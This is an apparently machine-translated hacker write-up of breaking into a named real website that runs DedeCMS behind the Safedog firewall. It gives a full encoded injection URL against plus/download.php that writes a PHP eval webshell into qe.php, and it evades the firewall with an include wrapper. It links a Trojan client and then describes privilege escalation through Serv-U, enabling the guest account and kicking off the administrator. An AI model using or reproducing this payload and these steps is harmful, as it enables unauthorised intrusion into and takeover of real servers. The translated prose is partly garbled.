Dedecms is a new version of safedog. Get shell + Elevation of Privilege.
Http://www.mfztdw.net/Target Site
First, use the getshell tool of dedecms to write a Trojan to access a secure dog.
The new version of dongle cannot be connected even if it has been used with a kitchen knife.
[Hide]
In this case, use the old method --> File Inclusion
Because no custom file name is saved in the tool, you can change the code by yourself.
(Here we will talk about aid, which can no longer be used after it has been used once, so aid also needs to be replaced by another one. If it is used once, you can just change it)
http://www.mfztdw.net/plus/download.php?open=1&arrs1 [] = 99 & arrs1 [] = 102 & arrs1 [] = 103 & arrs1 [] = 95 & arrs1 [] = 100 & arrs1 [] = 98 & arrs1 [] = 112 & arrs1 [] = 114 & arrs1 [] = 101 & arrs1 [] = 102 & arrs1 [] = 105 & arrs1 [] = 120 & arrs2 [] = 109 & arrs2 [] = 121 & arrs2 [] = 116 & arrs2 [] = 97 & arrs2 [] = 103 & arrs2 [] = 96 & arrs2 [] = 32 & arrs2 [] = 40 & arrs2 [] = 97 & arrs2 [] = 105 & arrs2 [] = 100 & arrs2 [] = 44 & arrs2 [] = 101 & arrs2 [] = 120 & arrs2 [] = 112 & arrs2 [] = 98 & arrs2 [] = 111 & arrs2 [] = 100 & arrs2 [] = 121 & arrs2 [] = 44 & arrs2 [] = 110 & arrs2 [] = 111 & arrs2 [] = 114 & arrs2 [] = 109 & arrs2 [] = 98 & arrs2 [] = 111 & arrs2 [] = 100 & arrs2 [] = 121 & arrs2 [] = 41 & arrs2 [] = 32 & arrs2 [] = 86 & arrs2 [] = 65 & arrs2 [] = 76 & arrs2 [] = 85 & arrs2 [] = 69 & arrs2 [] = 83 & arrs2 [] = 40 & arrs2 [] = 50 & arrs2 [] = 49 & arrs2 [] = 50 & arrs2 [] = 51 & arrs2 [] = 44 & arrs2 [] = 64 & arrs2 [] = 96 & arrs2 [] = 92 & arrs2 [] = 39 & arrs2 [] = 96 & arrs2 [] = 44 & arrs2 [] = 39 & arrs2 [] = 123 & arrs2 [] = 100 & arrs2 [] = 101 & arrs2 [] = 100 & arrs2 [] = 101 & arrs2 [] = 58 & arrs2 [] = 112 & arrs2 [] = 104 & arrs2 [] = 112 & arrs2 [] = 125 & arrs2 [] = 102 & arrs2 [] = 105 & arrs2 [] = 108 & arrs2 [] = 101 & arrs2 [] = 95 & arrs2 [] = 112 & arrs2 [] = 117 & arrs2 [] = 116 & arrs2 [] = 95 & arrs2 [] = 99 & arrs2 [] = 111 & arrs2 [] = 110 & arrs2 [] = 116 & arrs2 [] = 101 & arrs2 [] = 110 & arrs2 [] = 116 & arrs2 [] = 115 & arrs2 [] = 40 & arrs2 [] = 39 & arrs2 [] = 39 & arrs2 [] = 113 & arrs2 [] = 101 & arrs2 [] = 46 & arrs2 [] = 112 & arrs2 [] = 104 & arrs2 [] = 112 & arrs2 [] = 39 & arrs2 [] = 39 & arrs2 [] = 44 & arrs2 [] = 39 & arrs2 [] = 39 & arrs2 [] = 60 & arrs2 [] = 63 & arrs2 [] = 112 & arrs2 [] = 104 & arrs2 [] = 112 & arrs2 [] = 32 & arrs2 [] = 101 & arrs2 [] = 118 & arrs2 [] = 97 & arrs2 [] = 108 & arrs2 [] = 40 & arrs2 [] = 36 & arrs2 [] = 95 & arrs2 [] = 80 & arrs2 [] = 79 & arrs2 [] = 83 & arrs2 [] = 84 & arrs2 [] = 91 & arrs2 [] = 99 & amp; arrs2 [] = 109 & amp; arrs2 [] = 100 & amp; arrs2 [] = 93 & amp; arrs2 [] = 41 & amp; arrs2 [] = 63 & arrs2 [] = 62 & arrs2 [] = 39 & arrs2 [] = 39 & arrs2 [] = 41 & arrs2 [] = 59 & arrs2 [] = 123 & arrs2 [] = 47 & arrs2 [] = 100 & arrs2 [] = 101 & arrs2 [] = 100 & arrs2 [] = 101 & arrs2 [] = 58 & arrs2 [] = 112 & arrs2 [] = 104 & arrs2 [] = 112 & arrs2 [] = 125 & arrs2 [] = 39 & arrs2 [] = 41 & arrs2 [] = 32 & arrs2 [] = 35 & arrs2 [] = 32 & arrs2 [] = 64 & arrs2 [] = 96 & arrs2 [] = 92 & arrs2 [] = 39 & arrs2 [] = 96 copy code
Use the above Code to generate an qe. php with the content of php's one-sentence Trojan (The purpose of the tool is to avoid duplication)
Then, generate a qf. php file with the following content: <? Php require_once ("qe. php");?>
Visit the http://www.mfztdw.net//plus/qf.php again and there is no safe dog prompt
But how can a trojan be connected?
I am using a lanker Trojan client.
Http://pan.baidu.com/share/link? ... 8 & uk = 1058480443
(Some people say there is nothing in the download, but now it is stored in the online storage)
Then use the upload function to upload a trojan in the image format, or use the write function to write a trojan in the image format and a file containing
In this way, the horse will be able to access
Let's look at the root. I still want the root to raise the right. The result shows serv_u. This is not the server that sends the door!
Serv_u: The command is successfully executed. It's good. Because of the security dog, it's troublesome to add an account, so activate guest.
The connection exceeds the maximum allowed value. I guess it should be an administrator.
Take care of him! Use serv_u to execute logoff 1 and check if it is kicked out...
Successfully logged on to the server
Fuck! We have installed another 360 million!
It seems like this is a stupid dog. It was not intercepted during getshell!